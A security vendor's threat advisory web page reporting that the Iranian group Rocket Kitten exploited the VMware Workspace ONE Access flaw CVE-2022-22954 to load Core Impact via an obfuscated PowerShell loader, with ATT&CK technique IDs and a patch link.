Partner Program
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them.
IntegrationsSync with an abundant number of out-of-the-box integrations.
HiveForce LabsStrategic intelligence and operational expertise to ensure comprehensive security readiness at all levels.
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Data Sheets
Whitepapers
Press Releases
connect
Webinars & Videos
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoStart Free Trial
Platform
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them.
IntegrationsSync with an abundant number of out-of-the-box integrations.
HiveForce LabsStrategic intelligence and operational expertise to ensure comprehensive security readiness at all levels.
Solutions
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Data Sheets
Whitepapers
Press Releases
connect
Webinars & Videos
Company
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoStart Free Trial

Newly patched VMware vulnerability exploited by Iranian espionage group, Rocket Kitten

Threat Level – Amber | Vulnerability Report
Download PDF

THREAT LEVEL: Red.

For a detailed advisory, download the pdf file here

An Iranian cyber espionage gang known as Rocket Kitten has began delivering the Core Impact penetration testing tool on susceptible computers by exploiting a newly fixed severe vulnerability in VMware Workspace ONE Access/Identity Manager program.

Threat actors use the VMWare Identity Manager Service flaw (CVE-2022-22954) to acquire initial access to a target system, then install a PowerShell stager to download the next stage payload, nicknamed PowerTrash Loader. The PowerTrash Loader is a 40,000-line PowerShell script that has been substantially obfuscated. PowerTrash Downloader introduces the penetration testing framework Core Impact to memory at the end of the attack chain.

The MITRE ATT&CK TTPs commonly used by Rocket Kitten are:

TA0001: Initial Access       

TA0002: Execution       

TA0006: Credential Access       

TA0009: Collection       

TA0011: Command and Control

T1059 – Command and Scripting Interpreter

T1189 – Drive-by Compromise

T1555.003: Credentials from Password Stores: Credentials from Web Browsers

T1105: Ingress Tool Transfer

T1056.001: Input Capture: Keylogging

T1566.001: Phishing: Spearphishing Attachmet

T1566.003: Phishing: Spearphishing via Servicen

T1204.002: User Execution: Malicious File

Actor Details

Vulnerability Details

Indicators of Compromise (IoCs)

Patch Links

https://www.vmware.com/security/advisories/VMSA-2022-0011.html

References

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor

What’s new on HivePro

Get through updates and upcoming events, and more directly in your inbox